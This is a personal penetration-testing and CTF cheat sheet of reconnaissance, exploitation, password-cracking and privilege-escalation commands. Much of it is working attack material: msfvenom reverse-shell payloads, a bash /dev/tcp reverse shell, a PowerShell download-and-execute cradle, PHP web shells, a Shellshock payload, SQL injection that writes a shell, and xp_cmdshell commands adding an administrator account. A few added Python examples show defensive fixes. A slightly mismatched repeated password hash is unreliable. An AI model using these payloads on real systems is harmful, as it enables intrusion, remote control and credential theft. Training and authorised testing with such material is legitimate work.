CEH Practical – LPT Master – CTF – Notes in general

CEH Practical – LPT (Master) – CTF

Notes

 

 

I have gathered these notes from the internet and courses that I have attended.

Special thanks to:

JENS GILGES

https://www.linkedin.com/in/jens-gilges-1aa719151/

 

I used this site as a notepad to remember things, not to give you an answer. So if you don’t like it, don’t read it.

It has no structure and no index, just my notes from videos, other sites and manuals.

And I don’t go through spell checks before posting.

 

Thanks for the knowledge:

https://highon.coffee/

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Recon/Information Gathering

 

Passive

Social media, company website, publicly available resources, job openings. Tools: Netcraft, Archive.org, Shodan, Metagoofil, Maltego, recon-ng, Pipl, Thearchive.org, Sublist3r

 

Active

Interacting with the victim, for example becoming a Facebook friend.

 

Google Search

site:"invid.se" filetype:pdf

intitle:"VNC viewer for Java"

inurl:"/control/userimage.html"

inurl:.php? intext:CHARACTER_SETS,COLLATIONS intitle:phpmyadmin

 

Extract the IP from the host command

host www.cisco.com | grep "has address" | cut -d" " -f4

 

Extract domains from index.html

wget invid.se

cat index.html | grep "href" | cut -d"/" -f3 | grep "site\.se" | cut -d'"' -f1 | sort -u > site.txt

WWW data extractors

Windows

Web Data Extractor

Linux

httrack (linux)

Enumeration / Scanning

Banner grabbing

whatweb host.se

Netdiscover

Passive Mode

netdiscover -i eth0 -p

Active Mode

netdiscover -i eth0 -r 192.168.8.0/24 -f

 

Nmap port states explained (open, closed, filtered)

open

An application is actively accepting TCP connections, UDP datagrams or SCTP associations on this port. Finding these is often the primary goal of port scanning. Security-minded people know that each open port is an avenue for attack. Attackers and pen-testers want to exploit the open ports, while administrators try to close or protect them with firewalls without thwarting legitimate users. Open ports are also interesting for non-security scans because they show services available for use on the network.

closed

A closed port is accessible (it receives and responds to Nmap probe packets), but there is no application listening on it. They can be helpful in showing that a host is up on an IP address (host discovery, or ping scanning), and as part of OS detection. Because closed ports are reachable, it may be worth scanning later in case some open up. Administrators may want to consider blocking such ports with a firewall. Then they would appear in the filtered state, discussed next.

filtered

Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. The filtering could be from a dedicated firewall device, router rules, or host-based firewall software. These ports frustrate attackers because they provide so little information. Sometimes they respond with ICMP error messages such as type 3 code 13 (destination unreachable: communication administratively prohibited), but filters that simply drop probes without responding are far more common. This forces Nmap to retry several times just in case the probe was dropped due to network congestion rather than filtering. This slows down the scan dramatically.

unfiltered

The unfiltered state means that a port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, which is used to map firewall rulesets, classifies ports into this state. Scanning unfiltered ports with other scan types such as Window scan, SYN scan, or FIN scan, may help resolve whether the port is open.

open|filtered

Nmap places ports in this state when it is unable to determine whether a port is open or filtered. This occurs for scan types in which open ports give no response. The lack of response could also mean that a packet filter dropped the probe or any response it elicited. So Nmap does not know for sure whether the port is open or being filtered. The UDP, IP protocol, FIN, NULL, and Xmas scans classify ports this way.

closed|filtered

This state is used when Nmap is unable to determine whether a port is closed or filtered. It is only used for the IP ID idle scan.

 

Nmap examples

nmap -p 80 --script=http-enum www.certifiedhacker.com

nmap -p- -Pn -sS -sV -A 10.10.10.1

nmap -p- -Pn -sU -sS -sV -A 10.10.10.1

nmap -sC -sV -oA nmap/initial 10.10.10.1

nmap -p 445 --script safe -Pn -n 10.10.10.1

nmap -p 445 --script "vuln and safe" -Pn -n 10.10.10.1

Nmap Scripts

--script=vuln All default vulnerability scripts

--script=http-enum HTTP enumeration, banner grab and so on

--script=http-shellshock Shellshock detection

--script=smb-brute SMB brute force

 

Search for scripts

grep -r categories /usr/share/nmap/scripts/*.nse

grep -r categories /usr/share/nmap/scripts/*.nse | grep safe

grep -r categories /usr/share/nmap/scripts/*.nse | grep -oP '".*?"' | sort -u

grep -r categories /usr/share/nmap/scripts/*.nse | grep default | awk -F: '{print $1}'

 

Default scripts and smb:

locate -r '\.nse$' | xargs grep categories | grep 'default\|version' | grep smb

Nmap – Options

-n disable DNS resolution

-sC default scripts

-sn ping sweep

-sT Connect scan (full 3-way handshake)

-sS Stealth half-open scan: SYN -> SYN/ACK -> RST

-sX Xmas scan (FIN/URG/PSH); no response means the port is open (Linux targets)

-sN Null scan, TCP packet with no flags set; no response means the port is open (Linux targets)

-sV version detection

-sU UDP scan

-p- -A all ports and aggressive

-sU -p 162 snmp agent

Nmap – Combos

-sS -sV Stealth and version

-sI Idle scan via a zombie host (good against an IDS, the probes appear to come from the zombie)

-sS -O operating system detection

-sn -f ping sweep with fragmentation

-p 80 -A -T3 aggressive scan of port 80 with timing template T3 (T0 slowest to T5 fastest)

-sS -D RND:10 decoy scan with 10 random decoys

 

Port scanning with Netcat

TCP scan

nc -nvv -w 1 -z 10.0.2.15 1-10000

 

UDP scan

UDP scans can give false positives if the host does not respond with ICMP port-unreachable messages

nc -unvv -w 1 -z 10.0.2.15 160-165

 

Hping3

Half-Open SYN scan

hping3 -8 80 -S 1.2.3.4

XMAS Tree Scan

hping3 -F -P -U <target> -p <port>

Null Scan (no flags set)

hping3 <target> -p <port>

FIN Scan

hping3 -F <target> -p <port>

ACK Scan

hping3 -A <target> -p <port>

UDP scan

hping3 -2 <target> -p <port>

 

Ping and portscan from shell

ping from shell to get online hosts

for ip in $(seq 1 254); do ping -c 1 172.20.40.$ip > /dev/null && echo "Online: 172.20.40.$ip"; done

 

Port scan from the shell without nmap (or download a static nmap build from GitHub)

for port in 22 25 80 443 445 8080 8443; do (echo Anything > /dev/tcp/172.20.40.201/$port && echo "open - $port") 2> /dev/null; done

 

Check whether a single port is open or closed with bash

bash -c 'echo 1> /dev/tcp/172.20.20.188/1900 && echo open || echo false'

 

Gobuster

./gobuster -fw -k -u https://10.10.10.1 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Dirb

dirb http://10.10.10.1 /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Curl

curl --url "imap://mail.example.com/" --user "bobby:tables"

Upload

curl --upload-file file.txt -v --url <url> -0 --http1.0

Cewl

Find words on web pages that can be used for password cracking.

cewl http://www.site.se -m 6 -w /cewl.txt

The list can then be passed to John The Ripper

 

Directory or Path Traversal

192.168.1.1/dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd

Null Byte

?page=../../../../../etc/passwd%00

 

Wpscan

wpscan -u http://10.1.1.1/ --enumerate t --enumerate u

wpscan -u http://10.1.1.1 -e --log tenten_wpscan.txt

wpscan --url <url> Scan cms

wpscan --url <url> --enumerate vp (scan vulnerable plugins)

wpscan --url <url> --enumerate t (scan themes)

wpscan --url <url> --enumerate u (enumerate users)

wpscan --url <url> --wordlist pass.txt --threads 50 (brute force)

 

Metagoofil

metagoofil.py -d apple.com -t doc,pdf -l 200 -n 50 -o applefiles -f results.html

Nikto

nikto -h 10.1.1.1

 

Droopescan

./droopescan scan drupal -u http://192.168.2.152

Dns

nslookup

server 10.10.10.100

 

host -t ns domain.se

host -t mx domain.se

host http://www.domain.se

Zone transfer

host -t axfr domain.se ns1.domain.se

host -l domain.se 10.1.1.1

zone transfers

host -l server.se ns3.server.se.

 

Reverse DNS

theharvester -n -d host.se -b all

Dnsenum

dnsenum domain.se

 

Dnsrecon

dnsrecon -d 10.10.10.100 -r 10.0.0.0/8

Smtp

vrfy

for user in $(cat users.txt); do echo VRFY $user | nc -nv -w 1 192.168.1.1 25 2>/dev/null | grep ^"250"; done

Python script to VRFY (Python 3)

#!/usr/bin/env python3
import socket
import sys

if len(sys.argv) != 2:
    print("Usage: vrfy.py <username>")
    sys.exit(0)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 25))
banner = s.recv(1024)  # read the server greeting before sending anything
print(banner.decode(errors="replace"))
s.send(("VRFY " + sys.argv[1] + "\r\n").encode())
result = s.recv(1024)
print(result.decode(errors="replace"))
s.close()

Smb

Rpcclient

Old

rpcclient -U roger 192.168.1.1

srvinfo

enumdomusers

enumalsgroups domain

lookupnames administrators

querydominfo

enumdomusers

queryuser roger

Nbtscan

nbtscan -f target

nbtscan -v verbose

Smb enumeration

enum4linux -a 192.168.1.1

 

Smb nmap

nmap --script=vuln 192.168.1.1 -p 445

Smbclient

Look for shares

smbclient -L //10.10.10.100 -U name

smbclient \\\\192.168.1.1\\Share -W DOMAIN -U roger

Smbmap

Locate Shares:

smbmap -H 10.10.10.100

List Files on Share

smbmap -R Replication -H 10.10.10.100

List Files

smbmap -R Replication -H 10.10.10.100 -A Groups.xml -q

 

smbmap -u username -p 'HASH:HASH' -H 192.168.1.1 -R --download path/pathtofile.txt

 

--download Download a file with smbmap

Smbclient

smbclient //10.10.10.100/Replication

recurse ON

prompt OFF

mget *

Smb impacket

/usr/share/doc/python-impacket/examples/GetADUsers.py -all domain.dc/svc_user -dc-ip 10.10.10.1

 

/usr/share/doc/python-impacket/examples/psexec.py domain.dc/svc_tgs@10.10.10.1

smbmap -d domain.dc -u svc_user -p password -H 10.10.10.1

 

/usr/share/doc/python-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.1 domain.dc/svc_user

 

/usr/share/doc/python-impacket/examples/psexec.py domain.dc/Administrator@10.10.1.1

-R lists files recursively

Password from GPO Policy

less /usr/share/smbmap/10.1.1.1/Replication_domain.dc_Policies_\{31B2F340-016D-11D2-945F-00C0aFB984F9\}_MACHINE_Preferences_Groups_Groups.xml

edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

 

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJa3mjWA98ga9guKOhaOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

(gpp-decrypt prints the cleartext password)

 

Windows Tips

Run as command

runas /netonly /user:domain.dc\svc_user cmd

Windows Credentials Editor (WCE)

wce64.exe -w

Sharphound

SharpHound.exe -c all -d domain.dc --domaincontroller 10.10.1.1

Find files Windows

where /R C:\ bash.exe

 

Getting Access and Maintaining Access

Searchsploit

Mirror (copy) an exploit to the current directory

searchsploit -m exploits/php/webapps/18650.py

 

searchsploit -x exploits/php/webapps/18650.py

searchsploit -p exploits/php/webapps/18650.py

Metasploit

Start the database

service postgresql start

Start Metasploit

msfconsole -q

 

Exit/background a session: Ctrl-Z or type background

 

exploit -j

sessions -i

sessions -l

setg sets a global value, e.g. setg RHOST 192.168.1.1

Metasploit Steps

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

show options

set LHOST ip

set LPORT port

exploit -j

 

Access the exploit

shell.aspx

 

shell

systeminfo

 

Search for suggested exploits

use post/multi/recon/local_exploit_suggester

set SESSION 1

run

 

use exploit/windows/local/ms10_015_kitrap0d

set lhost ip

set lport port

Create Payloads

Msfvenom

Linux

msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.1 LPORT=4444 SHELL=/bin/bash -a cmd --platform Unix -e generic/none

 

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f elf > shell.elf

Windows

msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.1 lport=8888 -f exe > /root/Desktop/1.exe

 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f macho > shell.macho

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f raw > shell.php

cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

msfvenom -p php/meterpreter_reverse_tcp lhost=10.10.14.10 LPORT=4444 > r2.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f war > shell.war

Python

msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.1 LPORT=444 -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.1 LPORT=444 -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.1 LPORT=444 -f raw > shell.pl

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f <TYPE>

Unicorn

Create Payload

python unicorn.py windows/meterpreter/reverse_http 10.1.1.1 8001

Use exploit and create payload

Exploit:

chmod 755 cve-2017-8759_toolkit.py

 

Create Payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=6996 -f exe > /tmp/gotcha.exe

 

Create rtf file from exploit

python cve-2017-8759_toolkit.py -M gen -w Gotcha.rtf -u http://192.168.1.101/gotcha.txt

 

Host the payload on our server

python cve-2017-8759_toolkit.py -M exp -e http://192.168.1.101/gotcha.exe -l /tmp/gotcha.exe

Mini web server with python

python -m SimpleHTTPServer 80

File download

PowerShell

powershell "IEX(new-object net.webclient).downloadstring('http://10.1.1.10/empire.ps1')"

Linux

wget 192.168.1.1:80/attack.txt

curl 192.168.1.1:80/attack.txt > file.txt

fetch http://192.168.1.1:80/attack.txt

 

Victim > Attacker

nc -lvp 4444 > file.txt

nc 192.168.1.1 4444 < file.txt

 

Attacker > Victim

Target

nc -nvlp 81 > file.txt

Attacker

nc 192.168.1.1 81 < file.txt

 

Netcat

Victim:

nc -lvnp 4444 > incoming.exe

Source:

nc -nv 10.0.2.15 4444 < /usr/share/windows-binaries/wget.exe

 

Windows

Tftp

Server

atftpd -v --port 69 --bind-address 10.10.10.2 --daemon /srv/tftp/

Client

tftp -i 192.168.1.1 GET nc.exe

 

Ftp

On Windows you can script this with a text file of ftp commands

ftp -s:ftp.txt

Contents of ftp.txt, for example:

ftp 192.168.1.1

binary

ls

get nc.exe

put nc.exe

Reverse Shell

Netcat

Use ncat to get support for SSL and access-control rules

Listener

nc -lvnp 4444

Connector

nc -nv 192.168.1.1 4444

 

Netcat Command execution

Victim

nc -lvnp 4444 -e /bin/bash

Source

nc -nv 10.0.2.15 4444

Netcat Windows to get PowerShell shell

nc64.exe 10.1.1.1 9001 -e powershell

 

Shell from dash or another bad shell

Attacker:
nc -nlvp 9001

Victim:
bash -c 'bash -i >& /dev/tcp/192.168.1.1/9001 0>&1'

You get a shell on the attacker, then:
python -c 'import pty; pty.spawn("/bin/bash")'

After that

script -q /dev/null

Then backround

ctrl z

Then type

stty raw -echo

Then hit fg for foreground

 

OpenSSL

Create cert

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

 

Start the listener on the attacker

openssl s_server -quiet -key key.pem -cert cert.pem -port 4444

 

Start the reverse shell on the victim with openssl

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.1.1:4444 > /tmp/s; rm /tmp/s

ASPX

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f aspx -o shell.aspx

PHP

Create s.php

/*s.php*/

<?php echo shell_exec($_GET['cmd']); ?>

 

Copy nc.exe and s.php to web folder

 

http://10.10.10.1/s.php?cmd=nc 10.10.14.10 4444 -e cmd

 

wget 10.1.1.1:80/php-reverse-shell.txt -P /var/www/admin/

mv /var/www/admin/php-reverse-shell.txt /var/www/admin/php-reverse-shell.php

Nice remote shell

python -c ‘import pty; pty.spawn(“/bin/bash”)’

export TERM=linux

No real bash

ctrl z

background

stty raw -echo

fg

 

Password

Responder

Set up responder to listen to clients and capture hashes

responder

 

Capture NTLM hashes from SQL injection

Start smb server On Attacker

impacket-smbserver share $(pwd)

 

Use this on the webpage:

; use master; exec xp_dirtree '\\10.1.1.1\share';--

Unshadow

sudo /usr/sbin/unshadow /etc/passwd /etc/shadow > ~/passwords.txt

HASHCAT

hashcat -h | grep -i ntlm

 

hashcat -m 3100 hashes.txt /opt/share/wordlist/rockyou.txt

 

Launch a combination attack against MD5 password hashes

hashcat -m 0 -a 1 /root/hashes/hashes.txt /root/rockyou.txt

 

A straight (dictionary) attack is very fast on simple passwords

hashcat -m 0 -a 0 /root/hashes/hashes.txt /root/rockyou.txt

 

John The Ripper

john hashes.txt --format=nt --show (crack NTLM)

 

Use the cewl.txt wordlist with John The Ripper's rules to

 

john --wordlist=cewl.txt --rules --stdout > pass.txt

 

john --wordlist=/usr/share/wordlists/rockyou.txt

 

RSA

Now we need to convert the RSA key to john format and save it in a file:

root@kali:~# ssh2john rsakey > rsa2johnfile

 

Now crack the passphrase using any wordlist:

root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt --format=SSH rsa2johnfile

 

When it’s done, you can show the password if it has been cracked by issuing the following command:

root@kali:~# john --show rsa2johnfile

Passwords dumps Windows

Pwdump and FGdump

Crunch: create password lists

crunch 6 6 01234567890ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ

 

Passing The Hash

Passing the hash

pth-*

export SMBHASH=1231234124124124124:1243124124124124124124124

pth-winexe -U administrator% //192.168.1.1 cmd

 

Medusa

medusa -h 192.168.1.1 -u admin -P password.txt -M http -m DIR:/admin -T 20

 

Ncrack

Use for RDP brute force

ncrack -v -f --user administrator -P password.txt rdp://192.168.1.1,CL=1

Hydra

hydra -l root -P /usr/share/wordlists/rockyou.txt -u -s 22 10.1.1.1 ssh

 

hydra 10.1.1.1 -V -l user -P /usr/share/wordlists/rockyou.txt http-get-form "/login.php:username=^USER^&password=^PASS^&Login=Login:F=The password you entered was not valid.:H=Cookie: PHPSESSID=2tr9o96unnmlrgfom8hbaqhp7l; security=low"

 

hydra -l admin -P /usr/share/wordlists/rockyou.txt docker.hackthebox.eu http-post-form “/:password=^PASS^:Invalid password!” -s 54415 -I

MySQL

Connect to local database

mysql -u zabbix -D zabbixdb -p

Sqlmap

Use burpsuite to capture login request

Save login request to login.req

sqlmap -r login.req --level 5

Search for databases

sqlmap -u "http://192.168.1.1/index.php?par=" --dbs

Checking privileges of the users in database

sqlmap -u "192.168.1.124/sqli/Less-1/?id=1" --privileges

 

Reading a file from the web server

sqlmap -u "192.168.1.124/sqli/Less-1/?id=1" --file-read=/xampp/htdocs/index.php --batch

 

Dump Username and Password

sqlmap -u "http://192.168.1.1/comment.php?id=123" --dbms=mysql --dump --threads=5

 

Dump tables

sqlmap -u "http://192.168.1.1/index.php?par=" --dbs -D dbname --tables --dump

sqlmap -u "http://192.168.1.1/index.php?par=" --dbs -D dbname -T tablename --dump

 

Automated Shell

sqlmap -u "http://192.168.1.1/comment.php?id=123" --dbms=mysql --os-shell

 

sqlmap -u http://10.1.1.1/login.php --forms --level 5 --risk 3 --string "The password you entered was not valid." --dbs --batch

 

sqlmap -l trace.txt --dbs (RDBMS enumeration)

sqlmap -l trace.txt -D <db> --tables (list tables)

sqlmap -l trace.txt -D <db> -T <table> --dump (dump table content)

 

Crawl links

sqlmap -u http://192.168.1.1 --crawl=1

sqlmap -u http://192.168.1.1 --forms --batch --crawl=5 --cookie=jsessionid=1234 --level=5 --risk=3

 

Manual SQL injection commands

 

Check for an SQLi vulnerability (an error or a changed page means the quote reached the query)

?id=1'

 

Find the number of columns

?id=1 order by 9 -- -

 

Find which columns are echoed to the page, to use for output

?id=1 union select 1,2,3,4,5,6,7,8,9 -- -

 

Get the username of the SQL user

?id=1 union select 1,2,3,4,user(),6,7,8,9 -- -

 

Get the version

?id=1 union select 1,2,3,4,version(),6,7,8,9 -- -

 

Get all tables

?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -

 

Get all columns from a specific table

?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- -

 

Get the content of the users table, columns name and password (the 0x3a only serves as a ':' delimiter between name and password)

?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users

 

Read a file

?id=1 union select 1,2,3,4, load_file('/etc/passwd') ,6,7,8,9 -- -

?id=1 union select 1,2,3,4, load_file('/var/www/login.php') ,6,7,8,9 -- -

 

Create a file and read it back to check that it was really created

?id=1 union select 1,2,3,4,'this is a test message' ,6,7,8,9 into outfile '/var/www/test' -- -

?id=1 union select 1,2,3,4, load_file('/var/www/test') ,6,7,8,9 -- -

 

Create a file to get a shell

?id=1 union select null,null,null,null,'<?php system($_GET["cmd"]) ?>' ,6,7,8,9 into outfile '/var/www/shell.php' -- -

?id=1 union select null,null,null,null, load_file('/var/www/shell.php') ,6,7,8,9 -- -

 

Then go to the browser and see if you can execute commands

http://<targetip>/shell.php?cmd=id

 

SQL injections

How the login query is built from the two inputs (`-- -` starts a comment, so everything after it is ignored):

| User name | Password | SQL Query |
|---|---|---|
| tom | tom | SELECT * FROM users WHERE name='tom' and password='tom' |
| tom | ' or '1'='1 | SELECT * FROM users WHERE name='tom' and password='' or '1'='1' |
| tom | ' or 1='1 | SELECT * FROM users WHERE name='tom' and password='' or 1='1' |
| tom | 1' or 1=1 -- - | SELECT * FROM users WHERE name='tom' and password='1' or 1=1 -- -' |
| ' or '1'='1 | ' or '1'='1 | SELECT * FROM users WHERE name='' or '1'='1' and password='' or '1'='1' |
| ' or ' 1=1 | ' or ' 1=1 | SELECT * FROM users WHERE name='' or ' 1=1' and password='' or ' 1=1' |
| 1' or 1=1 -- - | blah | SELECT * FROM users WHERE name='1' or 1=1 -- -' and password='blah' |

 

Other payloads:

'or 1=1#

 

' or '1'='1
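To show why the rows in the table above log in without a valid password, here is an added example (my own code, not from the original notes): the same query built by string concatenation against a constructed in-memory SQLite users table, beside the parameterised query that defeats every payload in the table. SQLite does not accept the MySQL `#` comment form, so the `-- -` variants are used.

```python
import sqlite3

# Constructed sample data: the users table the queries in the table above run against.
SAMPLE_USERS = [("tom", "tom"), ("alice", "s3cret")]


def make_db():
    """In-memory SQLite database with a users(name, password) table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def build_query(name, password):
    """The query exactly as the table above constructs it: inputs spliced into the SQL text."""
    return ("SELECT * FROM users WHERE name='" + name
            + "' and password='" + password + "'")


def login_vulnerable(conn, name, password):
    """String-concatenated query. A quote in the input closes the literal and the
    rest of the input becomes SQL; 'or 1=1' then matches every row.
    A malformed payload (e.g. a lone quote) raises a syntax error, which is what
    the ?id=1' check looks for; here it is reported as a failed login."""
    try:
        return conn.execute(build_query(name, password)).fetchall()
    except sqlite3.Error:
        return []


def login_safe(conn, name, password):
    """Parameterised query. The values travel separately from the SQL text, so a
    quote or 'or 1=1' is compared as literal characters and never parsed."""
    return conn.execute(
        "SELECT * FROM users WHERE name=? and password=?", (name, password)
    ).fetchall()


def compare(name, password):
    """Run one (name, password) pair through both versions; returns (rows_vuln, rows_safe)."""
    conn = make_db()
    return len(login_vulnerable(conn, name, password)), len(login_safe(conn, name, password))


if __name__ == "__main__":
    for user, pw in [("tom", "tom"), ("tom", "' or '1'='1"), ("tom", "1' or 1=1 -- -"),
                     ("1' or 1=1 -- -", "blah"), ("tom", "'")]:
        print("%-18r %-18r vulnerable=%d safe=%d" % ((user, pw) + compare(user, pw)))
```

The vulnerable version returns both rows for every injected payload (the login "succeeds" as the first user returned), while the parameterised version returns a row only for the real credentials.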

 

Command injections

;ls
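The `;ls` probe works, like the `shell_exec($_GET['cmd'])` page earlier, because the application hands user input to a shell. Added example (my own code, not from the notes): a lookup helper written the vulnerable way, with `echo` standing in for the real tool so it runs anywhere, beside a version that allow-lists the argument and calls the program without a shell.

```python
import re
import subprocess

# Allow-list: a hostname is dot-separated labels of letters, digits and hyphens.
# Anything else (';', '|', '&', '$(', spaces, quotes) is rejected before any command runs.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def lookup_vulnerable(host):
    """Splices the input into a command line and runs it through the shell
    (the same mistake as shell_exec($_GET['cmd']) or "ping " + host).
    'echo' stands in for the real lookup tool; the text after ';' still runs."""
    cmdline = "echo resolving " + host
    proc = subprocess.run(cmdline, shell=True, capture_output=True, text=True)
    return proc.stdout


def is_valid_hostname(host):
    """True only for input that matches the allow-list."""
    return HOSTNAME_RE.match(host) is not None


def lookup_safe(host):
    """Validates against the allow-list, then passes the value as one argv element
    with shell=False, so no shell ever parses it. Returns None for rejected input."""
    if not is_valid_hostname(host):
        return None
    proc = subprocess.run(["echo", "resolving", host], capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    payload = "example.com;echo INJECTED"
    print("vulnerable:", repr(lookup_vulnerable(payload)))   # second command ran
    print("safe:      ", repr(lookup_safe(payload)))         # None, rejected
    print("safe:      ", repr(lookup_safe("example.com")))
```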

 

sqsh - interactive database shell for Sybase / MSSQL

Login

sqsh -S 127.0.0.1:123 -U sa -P secretpassword

exec xp_cmdshell 'whoami'

go

exec xp_cmdshell 'net user roger pass /add'

go

exec xp_cmdshell 'net localgroup Administrators roger /add'

go

exec xp_cmdshell 'net localgroup "Remote Desktop Users" roger /add'

go

go

Shellshock with Burpsuite

User-Agent: () { :; }; bash -i >& /dev/tcp/10.10.14.1/8081 0>&1

Snmp

snmpwalk 10.1.1.1 -c public -v 2c

onesixtyone

HEX to TXT and Back

xxd -ps fil.txt > fil.txt.hex

vi fil.txt.hex

xxd -r -ps fil.txt.hex > fil.txt

Stego and Strings

steghide --extract -sf ./Granted.jpg

binwalk -e

java -jar Stegsolve.jar

strings ./HackerAccessGranted.jpg

Stego Links

https://www.dcode.fr/caesar-cipher

https://www.splitbrain.org/_static/ook/

https://incoherency.co.uk/image-steganography/#unhide

 

Magic Numbers

hex to bin

xxd -r hashdump.txt hex.bz2

Links

https://en.wikipedia.org/wiki/List_of_file_signatures
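Added example (my own code, not from the notes) of the magic-number check the xxd line above relies on: a small identifier for signatures from that file-signature list, a decoder for a plain hex dump (what xxd -r -ps reverses), and a check that a file's extension agrees with its first bytes, useful when a .jpg from the stego section turns out to contain an archive.

```python
import binascii

# Constructed subset of the file-signature list; all of these sit at offset 0.
SIGNATURES = [
    (b"\x7fELF", "ELF executable"),
    (b"MZ", "Windows PE/DOS executable"),
    (b"\x89PNG\r\n\x1a\n", "PNG image"),
    (b"\xff\xd8\xff", "JPEG image"),
    (b"GIF87a", "GIF image"),
    (b"GIF89a", "GIF image"),
    (b"%PDF", "PDF document"),
    (b"PK\x03\x04", "ZIP archive (also docx, jar, apk)"),
    (b"\x1f\x8b", "gzip"),
    (b"BZh", "bzip2"),
    (b"\xfd7zXZ\x00", "xz"),
    (b"Rar!\x1a\x07", "RAR archive"),
]

# What each extension should contain; a mismatch is worth a closer look with binwalk.
EXPECTED_BY_EXT = {
    "exe": "Windows PE/DOS executable", "dll": "Windows PE/DOS executable",
    "png": "PNG image", "jpg": "JPEG image", "jpeg": "JPEG image", "gif": "GIF image",
    "pdf": "PDF document", "zip": "ZIP archive (also docx, jar, apk)",
    "gz": "gzip", "bz2": "bzip2", "xz": "xz",
}


def identify(data):
    """Return the type name whose magic bytes start `data`, or None if unknown."""
    for magic, name in SIGNATURES:
        if data.startswith(magic):
            return name
    return None


def from_hex_dump(text):
    """Reverse a plain hex dump (the xxd -ps form): drop whitespace, decode byte pairs."""
    return binascii.unhexlify("".join(text.split()))


def extension_mismatch(filename, data):
    """True when the extension claims a type we know and the magic bytes say otherwise."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    expected = EXPECTED_BY_EXT.get(ext)
    detected = identify(data)
    return expected is not None and detected is not None and detected != expected


if __name__ == "__main__":
    # Constructed sample: the first bytes of a bzip2 stream, as a plain hex dump.
    dump = "42 5a 68 39 31 41 59 26 53 59"
    blob = from_hex_dump(dump)
    print(identify(blob))                                # bzip2
    print(extension_mismatch("hashdump.jpg", blob))      # True
```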

Base64 encode decode

base64 filename.exe > file.txt

base64 -d file.txt > filename.exe

Base64 command and execute

echo ls /home | base64

bHMgL2hvbWUK

echo bHMgL2hvbWUK | base64 -d | bash

 

ProxyChains

Coming

Chisel

 

TCP tunnel over HTTP

https://github.com/jpillora/chisel.git

 

Attacker

chisel server -p 8000 -reverse -v

 

Client (Victim)

chisel client 172.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80

 

Windows Privilege Escalation

systeminfo

hostname

echo %username%

 

net users

 

ipconfig /all

route print

arp -a

netstat -ano

 

netsh firewall show state

netsh firewall show config

netsh advfirewall firewall show rule all

 

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

 

Sysinternals

accesschk.exe

 

net start

net stop

 

Registry Checks for Passwords

reg query HKLM /f password /t REG_SZ /s >pass.txt

reg query HKCU /f password /t REG_SZ /s >pass.txt

 

C:\sysprep.inf

C:\sysprep\sysprep.xml

%WINDIR%\Panther\Unattend\Unattended.xml

%WINDIR%\Panther\Unattended.xml

 

dir /b /s unattend.xml

dir /b /s web.config

dir /b /s sysprep.inf

dir /b /s sysprep.xml

dir /b /s *pass*

dir /b /s vnc.ini

 

Find writable files

dir /a-r-d /s /b

Empire Setup

git clone https://github.com/EmpireProject/Empire.git -b dev

cd Empire

cd setup

./setup.sh

 

PowerShell

Invoke-AllChecks

 

